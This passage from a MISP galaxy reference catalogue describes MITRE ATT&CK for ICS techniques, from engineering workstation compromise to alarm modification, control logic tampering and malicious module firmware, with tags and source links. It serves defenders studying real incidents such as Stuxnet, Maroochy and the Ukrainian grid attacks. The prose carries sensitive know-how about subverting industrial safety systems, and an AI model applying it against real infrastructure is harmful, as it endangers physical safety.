https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
https://www.us-cert.gov/ncas/alerts/TA17-293A
https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/
https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/
https://securelist.com/bad-rabbit-ransomware/82851/

Engineering Workstation Compromise

Adversaries may compromise and gain control of an engineering workstation as an Initial Access technique into the control system environment. Access to an engineering workstation may occur as a result of remote access or by physical means, such as a person with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to and control of other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.

The tag is: misp-galaxy:mitre-ics-techniques="Engineering Workstation Compromise"

Table 4394. Table References
Links
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Execution through API

Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software, such as Change Program State of a program on a PLC.

The tag is: misp-galaxy:mitre-ics-techniques="Execution through API"

Table 4395. Table References
Links
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Exploit Public-Facing Application

Adversaries may attempt to exploit public-facing applications to leverage weaknesses on Internet-facing computer systems, programs, or assets in order to cause unintended or unexpected behavior. These public-facing applications may include user interfaces, software, data, or commands. In particular, a public-facing application in the IT environment may provide adversaries an interface into the OT environment. ICS-CERT analysis has identified the probable initial infection vector for systems running GE’s Cimplicity HMI with a direct connection to the Internet.

The tag is: misp-galaxy:mitre-ics-techniques="Exploit Public-Facing Application"

Table 4396. Table References
Links
https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

Exploitation for Evasion

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. Adversaries may have prior knowledge through Control Device Identification about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious System Firmware.

The tag is: misp-galaxy:mitre-ics-techniques="Exploitation for Evasion"

Table 4397. Table References
Links
https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-02
https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s
https://nvd.nist.gov/vuln/detail/CVE-2018-8872
https://cwe.mitre.org/data/definitions/119.html
https://www.nrc.gov/docs/ML1209/ML120900890.pdf

Exploitation of Remote Services

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. ICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (“wormable”) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts.

The tag is: misp-galaxy:mitre-ics-techniques="Exploitation of Remote Services"

Table 4398. Table References
Links
https://attack.mitre.org/techniques/T1210/
https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

External Remote Services

Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point?to?point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. In the Maroochy Attack, the adversary was able to gain remote computer access to the system over radio. The 2015 attack on the Ukranian power grid showed the use of existing remote access tools within the environment to access the control system network. The adversary harvested worker credentials, some of them for VPNs the grid workers used to remotely log into the control system networks.3245 The VPNs into these networks appear to have lacked two?factor authentication.

The tag is: misp-galaxy:mitre-ics-techniques="External Remote Services"

Table 4399. Table References
Links
https://attack.mitre.org/wiki/Technique/T1133
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/
https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01
https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
https://dragos.com/blog/trisis/TRISIS-01.pdf
https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Graphical User Interface

Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine. In the 2015 attack on the Ukrainian power grid, the adversary utilized the GUI of HMIs in the SCADA environment to open breakers.

The tag is: misp-galaxy:mitre-ics-techniques="Graphical User Interface"

Table 4400. Table References
Links
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Hooking

Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for persistent means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process’s IAT, where pointers to imported API functions are stored.

The tag is: misp-galaxy:mitre-ics-techniques="Hooking"

Table 4401. Table References
Links
https://attack.mitre.org/techniques/T1179/
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

I/O Image

Adversaries may seek to capture process image values related to the inputs and outputs of a PLC. Within a PLC all input and output states are stored into an I/O image. This image is used by the user program instead of directly interacting with physical I/O.

The tag is: misp-galaxy:mitre-ics-techniques="I/O Image"

Table 4402. Table References
Links
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

I/O Module Discovery

Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.

The tag is: misp-galaxy:mitre-ics-techniques="I/O Module Discovery"

Table 4403. Table References
Links
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Indicator Removal on Host

Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.

The tag is: misp-galaxy:mitre-ics-techniques="Indicator Removal on Host"

Table 4404. Table References
Links
https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Internet Accessible Device

Adversaries may gain access into industrial environments directly through systems exposed to the internet for remote access rather than through External Remote Services. Minimal protections provided by these devices such as password authentication may be targeted and compromised. In the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing.

The tag is: misp-galaxy:mitre-ics-techniques="Internet Accessible Device"

Table 4405. Table References
Links
https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf
https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559
https://time.com/4270728/iran-cyber-attack-dam-fbi/
https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B
https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B

Location Identification

Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries1. While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. An adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.

The tag is: misp-galaxy:mitre-ics-techniques="Location Identification"

Table 4406. Table References
Links
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01
https://www.f-secure.com/weblog/archives/00002718.html

Loss of Availability

Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. Adversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Availability"

Table 4407. Table References
Links
https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

Loss of Control

Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Control"

Table 4408. Table References
Links
https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880
https://www.hydro.com/en/media/on-the-agenda/cyber-attack/

Loss of Productivity and Revenue

Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In some cases, this may result from the postponement and disruption of ICS operations and production as part of a remediation effort. Operations may be brought to a halt and effectively stopped in an effort to contain and properly remove malware or due to the Loss of Safety.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Productivity and Revenue"

Table 4409. Table References
Links
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml
https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880
https://www.hydro.com/en/media/on-the-agenda/cyber-attack/
https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war
https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760

Loss of Safety

Adversaries may cause loss of safety whether on purpose or as a consequence of actions taken to accomplish an operation. The loss of safety can describe a physical impact and threat, or the potential for unsafe conditions and activity in terms of control systems environments, devices, or processes. For instance, an adversary may issue commands or influence and possibly inhibit safety mechanisms that allow the injury of and possible loss of life. This can also encompass scenarios resulting in the failure of a safety mechanism or control, that may lead to unsafe and dangerous execution and outcomes of physical processes and related systems. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland.567 Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Safety"

Table 4410. Table References
Links
https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3[https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3]
https://www.londonreconnections.com/2017/hacked-cyber-security-railways/
https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html
https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Loss of View

Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of View"

Table 4411. Table References
Links
https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf
https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880
https://www.hydro.com/en/media/on-the-agenda/cyber-attack/

Man in the Middle

Adversaries with privileged network access may seek to modify network traffic in real time using man-in-the-middle (MITM) attacks. This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a MITM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. A MITM attack may allow an adversary to perform the following attacks: Block Reporting Message, Modify Parameter, Unauthorized Command Message, Spoof Reporting Message

The tag is: misp-galaxy:mitre-ics-techniques="Man in the Middle"

Table 4412. Table References
Links
https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
https://dragos.com/resource/hexane/
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Manipulate I/O Image

Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. During the PLC scan cycle, the state of the actual physical inputs is copied to a portion of the PLC memory, commonly called the input image table. When the program is scanned, it examines the input image table to read the state of a physical input. When the logic determines the state of a physical output, it writes to a portion of the PLC memory commonly called the output image table. The output image may also be examined during the program scan. To update the physical outputs, the output image table contents are copied to the physical outputs after the program is scanned. One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.

The tag is: misp-galaxy:mitre-ics-techniques="Manipulate I/O Image"

Table 4413. Table References
Links
https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Manipulation of Control

Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. Methods of Manipulation of Control include: Man-in-the-middle, Spoof command message, Changing setpoints

The tag is: misp-galaxy:mitre-ics-techniques="Manipulation of Control"

Table 4414. Table References
Links
Stuxnet can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property.[Stuxnet can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property.]

Masquerading

Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. Applications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.

The tag is: misp-galaxy:mitre-ics-techniques="Masquerading"

Table 4415. Table References
Links
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Modify Alarm Settings

Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a Impact could occur. In ICS environments, the adversary may have to use Alarm Suppression or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Alarm Settings"

Table 4416. Table References
Links
https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Modify Control Logic

Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. Program code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the required device-specific functions to apply the changes and make them active. An adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools. An adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. It is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the “real” pressure is for given analog signals and then automatically linearize the measurement to what would be the “real” pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be “corrected” during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Control Logic"

Table 4417. Table References
Links
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Modify Parameter

Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause Impact to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Parameter"

Table 4418. Table References
Links
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Module Firmware

Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. This technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. An easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.

The tag is: misp-galaxy:mitre-ics-techniques="Module Firmware"

Table 4419. Table References
Links
https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Monitor Process State

Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.

The tag is: misp-galaxy:mitre-ics-techniques="Monitor Process State"

Table 4420. Table References
Links
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Connection Enumeration

Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as netstat, in conjunction with System Firmware, then they can determine the role of certain devices on the network. The adversary can also use Network Sniffing to watch network traffic for details about the source, destination, protocol, and content.

The tag is: misp-galaxy:mitre-ics-techniques="Network Connection Enumeration"

Table 4421. Table References
Links
https://attack.mitre.org/wiki/Technique/T1049
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Service Scanning

Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on specific port numbers, the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is Nmap. An adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to. Scanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.

The tag is: misp-galaxy:mitre-ics-techniques="Network Service Scanning"

Table 4422. Table References
Links
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Network Sniffing

Network sniffing is the practice of using a network interface on a computer system to monitor or capture information1 regardless of whether it is the specified destination for the information. An adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. Network sniffing can be a way to discover information for Control Device Identification. In addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

The tag is: misp-galaxy:mitre-ics-techniques="Network Sniffing"

Table 4423. Table References
Links
https://attack.mitre.org/wiki/Technique/T1040
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://blog.talosintelligence.com/2018/06/vpnfilter-update.html
https://www.youtube.com/watch?v=yuZazP22rpI
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Point & Tag Identification

Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables.1 Tags are the identifiers given to points for operator convenience. Collecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.

The tag is: misp-galaxy:mitre-ics-techniques="Point & Tag Identification"

Table 4424. Table References
Links
